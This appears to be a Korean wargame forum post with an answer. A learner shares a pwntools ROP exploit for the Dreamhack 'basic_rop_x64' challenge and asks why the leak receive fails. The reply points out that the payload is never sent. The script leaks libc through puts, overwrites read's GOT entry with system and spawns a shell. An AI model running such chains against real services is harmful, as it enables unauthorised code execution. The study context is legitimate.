rop 문제 다시풀어보고잇는디
from pwn import *
# Open a pwntools tube to the remote challenge instance.
p = remote("host3.dreamhack.games",11394)
# Load the challenge binary and a libc image; both are used below only for
# PLT/GOT lookups and symbol offsets.
# NOTE(review): assumes libc.so.6 is the same build the remote service runs;
# with a different build the offsets used below would not match.
e = ELF("./basic_rop_x64")
libc = ELF("libc.so.6")
puts_plt=e.plt['puts']
read_plt=e.plt['read']
read_got=e.got['read']
# Hard-coded gadget addresses, named after the instruction sequences they are
# expected to point at (pop rdi; ret / pop rsi; pop r15; ret). The addresses
# themselves cannot be verified from this page.
# NOTE(review): fixed code addresses plus a write into read's GOT slot only
# work if the binary loads at a fixed base and its GOT is writable, so
# presumably it was built without PIE and without full RELRO (confirm with
# checksec). Those two mitigations, together with a stack canary, remove the
# preconditions this chain depends on.
pop_rdi=0x0000000000400883
pop_rsi_pop_r15=0x0000000000400881
# 48 filler bytes placed ahead of the chain.
# NOTE(review): whether 48 is the real distance to the saved return address is
# not shown on this page - TODO confirm against the binary.
payload=b'A'*48
# Stage 1: puts(read@got), which prints the resolved libc address of read.
payload+=p64(pop_rdi)+p64(read_got)
payload+=p64(puts_plt)
# Stage 2: read(0, read@got, <rdx>), which takes bytes from stdin into read's
# GOT slot. rdx (the length) is never set by this chain, so the call depends
# on whatever value the register happens to hold at that point.
payload+=p64(pop_rdi)+p64(0)
payload+=p64(pop_rsi_pop_r15)+p64(read_got)+p64(0)
payload+=p64(read_plt)
# Stage 3: call read@plt again with rdi = read@got + 8. After stage 2 the GOT
# slot holds whatever was written there, and the argument points at the bytes
# that follow the first 8 written.
payload+=p64(pop_rdi)
payload+=p64(read_got+0x8)
payload+=p64(read_plt)
# NOTE(review): `payload` has been built but is never written to the tube
# before this line, so the remote has no reason to emit the leak and recvn(6)
# waits for bytes that do not arrive. This is the line the question is about.
# The 6 received bytes are padded with two NULs so u64() gets a full 8-byte
# little-endian value.
# NOTE(review): if the service prints anything before the leak, those bytes
# would be read here instead - confirm against the binary's output.
read = u64(p.recvn(6)+b"\x00"*2)
# libc base = leaked address of read minus read's offset inside libc.
lb=read-libc.symbols["read"]
system=lb+libc.symbols["system"]
# Input for the stage-2 read: 8 bytes for the GOT slot, then the string that
# ends up at read@got + 8.
p.send(p64(system)+b"/bin/sh\x00")
p.interactive()
저 read = u64(p.recvn(6)+b"\x00"*2)
부분에서 오류가 떠요. 왜 그런 걸까유ㅜ
페이로드를 먼저 전달한 뒤에 read = u64(p.recvn(6)+b"\x00"*2) 로 값을 받으셔야 하는데, 페이로드를 보내는 한 줄이 빠진 것 같네요 ㅎㅎ